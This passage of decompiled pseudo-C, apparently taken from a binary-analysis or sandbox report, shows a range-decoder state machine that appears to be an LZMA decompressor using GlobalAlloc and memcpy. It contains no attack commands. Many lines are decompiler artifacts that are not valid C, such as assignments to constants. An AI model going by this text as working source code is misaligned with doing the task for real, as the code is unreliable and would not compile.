							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
